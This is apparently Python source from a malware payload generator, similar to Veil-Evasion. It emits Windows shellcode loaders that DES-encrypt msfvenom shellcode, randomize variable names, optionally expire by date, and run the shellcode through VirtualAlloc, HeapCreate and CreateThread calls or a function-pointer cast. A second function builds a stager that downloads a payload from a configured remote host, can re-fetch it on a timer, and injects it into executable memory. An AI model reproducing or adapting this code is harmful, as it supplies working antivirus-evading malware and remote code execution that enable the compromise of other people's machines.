            PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
            PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))'

            if self.required_options["USE_PYHERION"][0].lower() == "y":
                PayloadCode = encryption.pyherion(PayloadCode)

            return PayloadCode

    if self.required_options["INJECT_METHOD"][0].lower() == "heap":
        if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate(self.required_options)

            # Generate Random Variable Names
            RandPtr = helpers.randomString()
            RandBuf = helpers.randomString()
            RandHt = helpers.randomString()
            ShellcodeVariableName = helpers.randomString()
            RandIV = helpers.randomString()
            RandDESKey = helpers.randomString()
            RandDESPayload = helpers.randomString()
            RandEncShellCodePayload = helpers.randomString()
            HeapVar = helpers.randomString()

            # encrypt the shellcode and get our randomized key/iv
            (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)

            # Create Payload File
            PayloadCode = 'from Crypto.Cipher import DES\n'
            PayloadCode += 'import ctypes as avlol\n'
            PayloadCode += RandIV + ' = \'' + iv + '\'\n'
            PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
            PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
            PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
            PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
            # 0x00040000 = HEAP_CREATE_ENABLE_EXECUTE; the heap is sized at twice
            # the shellcode length.  0x00000008 = HEAP_ZERO_MEMORY.
            PayloadCode += HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + ShellcodeVariableName + ') * 2),avlol.c_int(0))\n'
            PayloadCode += RandPtr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + ShellcodeVariableName + ')))\n'
            PayloadCode += RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
            PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
            PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
            PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))'

            if self.required_options["USE_PYHERION"][0].lower() == "y":
                PayloadCode = encryption.pyherion(PayloadCode)

            return PayloadCode

        else:
            # Get our current date and add number of days to the date
            todaysdate = date.today()
            expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate(self.required_options)

            # Generate Random Variable Names
            RandPtr = helpers.randomString()
            RandBuf = helpers.randomString()
            RandHt = helpers.randomString()
            ShellcodeVariableName = helpers.randomString()
            RandIV = helpers.randomString()
            RandDESKey = helpers.randomString()
            RandDESPayload = helpers.randomString()
            RandEncShellCodePayload = helpers.randomString()
            HeapVar = helpers.randomString()
            RandToday = helpers.randomString()
            RandExpire = helpers.randomString()

            # encrypt the shellcode and get our randomized key/iv
            (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)

            # Create Payload File
            # same heap sequence as above, guarded by the embedded expiry date
            PayloadCode = 'from Crypto.Cipher import DES\n'
            PayloadCode += 'import ctypes as avlol\n'
            PayloadCode += 'from datetime import datetime\n'
            PayloadCode += 'from datetime import date\n\n'
            PayloadCode += RandToday + ' = datetime.now()\n'
            PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
            PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
            PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
            PayloadCode += '\t' + RandDESKey + ' = \'' + DESKey + '\'\n'
            PayloadCode += '\t' + RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
            PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
            PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
            PayloadCode += '\t' + HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + ShellcodeVariableName + ') * 2),avlol.c_int(0))\n'
            PayloadCode += '\t' + RandPtr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + ShellcodeVariableName + ')))\n'
            PayloadCode += '\t' + RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
            PayloadCode += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
            PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
            PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))'

            if self.required_options["USE_PYHERION"][0].lower() == "y":
                PayloadCode = encryption.pyherion(PayloadCode)

            return PayloadCode

    else:
        # any INJECT_METHOD other than "virtual" or "heap" lands here
        if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate(self.required_options)

            # Generate Random Variable Names
            # RandPtr, RandBuf, RandHt and RandReverseShell are unused in this branch
            RandPtr = helpers.randomString()
            RandBuf = helpers.randomString()
            RandHt = helpers.randomString()
            ShellcodeVariableName = helpers.randomString()
            RandIV = helpers.randomString()
            RandDESKey = helpers.randomString()
            RandDESPayload = helpers.randomString()
            RandEncShellCodePayload = helpers.randomString()
            RandShellcode = helpers.randomString()
            RandReverseShell = helpers.randomString()
            RandMemoryShell = helpers.randomString()

            # encrypt the shellcode and get our randomized key/iv
            (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)

            # Create Payload File
            # this variant keeps the decrypted data as a str (no bytearray) and
            # calls it through a ctypes function-pointer cast
            PayloadCode = 'from Crypto.Cipher import DES\n'
            PayloadCode += 'from ctypes import *\n'
            PayloadCode += RandIV + ' = \'' + iv + '\'\n'
            PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
            PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
            PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
            PayloadCode += ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
            PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
            PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
            PayloadCode += RandShellcode + '()'

            if self.required_options["USE_PYHERION"][0].lower() == "y":
                PayloadCode = encryption.pyherion(PayloadCode)

            return PayloadCode

        else:
            # Get our current date and add number of days to the date
            todaysdate = date.today()
            expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate(self.required_options)

            # Generate Random Variable Names
            # RandPtr, RandBuf, RandHt and RandReverseShell are unused in this branch
            RandPtr = helpers.randomString()
            RandBuf = helpers.randomString()
            RandHt = helpers.randomString()
            ShellcodeVariableName = helpers.randomString()
            RandIV = helpers.randomString()
            RandDESKey = helpers.randomString()
            RandDESPayload = helpers.randomString()
            RandEncShellCodePayload = helpers.randomString()
            RandShellcode = helpers.randomString()
            RandReverseShell = helpers.randomString()
            RandMemoryShell = helpers.randomString()
            RandToday = helpers.randomString()
            RandExpire = helpers.randomString()

            # encrypt the shellcode and get our randomized key/iv
            (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)

            # Create Payload File
            # same function-pointer variant as above, guarded by the embedded expiry date
            PayloadCode = 'from Crypto.Cipher import DES\n'
            PayloadCode += 'from ctypes import *\n'
            PayloadCode += 'from datetime import datetime\n'
            PayloadCode += 'from datetime import date\n\n'
            PayloadCode += RandToday + ' = datetime.now()\n'
            PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
            PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
            PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
            PayloadCode += '\t' + RandDESKey + ' = \'' + DESKey + '\'\n'
            PayloadCode += '\t' + RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
            PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
            PayloadCode += '\t' + ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
            PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
            PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
            PayloadCode += '\t' + RandShellcode + '()'

            if self.required_options["USE_PYHERION"][0].lower() == "y":
                PayloadCode = encryption.pyherion(PayloadCode)

            return PayloadCode
def generate(self):
    """Assemble the Python source of an HTTP download-and-inject script.

    The emitted script has four generated functions — an injector, a
    fetch-and-inject routine, a beacon loop and a main — plus a
    module-level flag and interval.  The fetch URL is built from
    DOWNLOAD_HOST, DOWNLOAD_PORT and DOWNLOAD_NAME as plain ``http://``,
    and the response body is passed straight to the injector with no
    integrity check; the fetch routine swallows every Exception.  With
    BEACON == 'y' the script also re-fetches every BEACON_SECONDS seconds
    from a daemon thread and keeps the main thread alive in a sleep loop.

    Returns the script source as a str, optionally passed through
    encryption.pyherion() when USE_PYHERION is "y".

    NOTE(review): a BEACON value other than 'y'/'n' leaves global_vars
    unbound and the `+=` below raises NameError; the option is presumably
    validated upstream — confirm.
    """
    imports = "import sys; import urllib2; import ctypes; import time; import signal; import threading\n"

    inject_func = helpers.randomString()
    getexec_func = helpers.randomString()
    main_func = helpers.randomString()
    beaconthr_func = helpers.randomString()
    retry_var = helpers.randomString()

    # module-level flag that tells the emitted main whether to start the beacon thread
    if self.required_options["BEACON"][0].lower() == 'n':
        global_vars = "%s = False" % retry_var
    elif self.required_options["BEACON"][0].lower() == 'y':
        global_vars = "%s = True" % retry_var

    # interval and opener are emitted regardless of BEACON; BEACON_SECONDS is
    # interpolated verbatim into the generated source
    interval_var = helpers.randomString()
    opener_var = helpers.randomString()
    global_vars += "\n%s = %s" % (interval_var, self.required_options["BEACON_SECONDS"][0])
    global_vars += "\n%s = urllib2.build_opener()\n" % (opener_var)

    shellcode_var = helpers.randomString()
    ptr_var = helpers.randomString()
    ht_var = helpers.randomString()
    buff_var = helpers.randomString()

    # injector: VirtualAlloc (0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 =
    # PAGE_EXECUTE_READWRITE), VirtualLock, RtlMoveMemory, CreateThread, wait
    inject = "def %s(%s):" % (inject_func, shellcode_var)
    inject += "\n\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))" % (ptr_var, shellcode_var)
    inject += "\n\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))" % (ptr_var, shellcode_var)
    inject += "\n\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)" % (buff_var, shellcode_var, shellcode_var)
    inject += "\n\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))" % (ptr_var, buff_var, shellcode_var)
    inject += "\n\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))" % (ht_var, ptr_var)
    inject += "\n\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" % ht_var

    # fresh names for the fetch routine; shellcode_var is deliberately re-drawn
    # here so the injector's parameter and the fetch routine's local differ.
    # thread_name2 is assigned but never used.
    url_var = helpers.randomString()
    shellcode_var = helpers.randomString()
    info_var = helpers.randomString()
    thread_var = helpers.randomString()
    thread_name = helpers.randomString()
    thread_name2 = helpers.randomString()

    # fetch routine: open the URL, read the body, hand it to the injector;
    # any Exception is silently dropped
    getexec = "def %s(%s):" % (getexec_func, url_var)
    getexec += "\n\ttry:"
    getexec += "\n\t\t%s = %s.open(%s)" % (info_var, opener_var, url_var)
    getexec += "\n\t\t%s = %s.read()" % (shellcode_var, info_var)
    getexec += "\n\t\t%s = bytearray(%s)" % (shellcode_var, shellcode_var)
    getexec += "\n\t\t%s(%s)" % (inject_func, shellcode_var)
    getexec += "\n\texcept Exception:"
    getexec += "\n\t\tpass\n"

    # beacon loop: sleep for the interval, then run the fetch routine on a daemon thread
    url_var = helpers.randomString()
    beaconthr = "def %s(%s):" % (beaconthr_func, url_var)
    beaconthr += "\n\twhile True:"
    beaconthr += "\n\t\ttime.sleep(%s)" % interval_var
    beaconthr += "\n\t\t%s = threading.Thread(name='%s', target=%s, args=(%s,))" % (thread_var, thread_name, getexec_func, url_var)
    beaconthr += "\n\t\t%s.setDaemon(True)" % thread_var
    beaconthr += "\n\t\t%s.start()\n" % thread_var

    # main: build the cleartext HTTP URL, optionally start the beacon thread,
    # do one fetch, and (beacon mode only) park the main thread
    main = "def %s():" % main_func
    main += "\n\t%s = 'http://%s:%s/%s'" % (url_var, self.required_options['DOWNLOAD_HOST'][0], self.required_options['DOWNLOAD_PORT'][0], self.required_options['DOWNLOAD_NAME'][0])
    main += "\n\tif %s is True:" % retry_var
    main += "\n\t\t%s = threading.Thread(name='%s', target=%s, args=(%s,))" % (thread_var, thread_name, beaconthr_func, url_var)
    main += "\n\t\t%s.setDaemon(True)" % thread_var
    main += "\n\t\t%s.start()" % thread_var
    main += "\n\t%s(%s)" % (getexec_func, url_var)
    if self.required_options["BEACON"][0].lower() == 'y':
        main += "\n\twhile True:"
        main += "\n\t\ttime.sleep(0.1)"
    main += "\nif __name__ == '__main__':"
    main += "\n\t%s()" % main_func

    PayloadCode = imports + global_vars + inject + getexec + beaconthr + main

    if self.required_options["USE_PYHERION"][0].lower() == "y":
        PayloadCode = encryption.pyherion(PayloadCode)

    return PayloadCode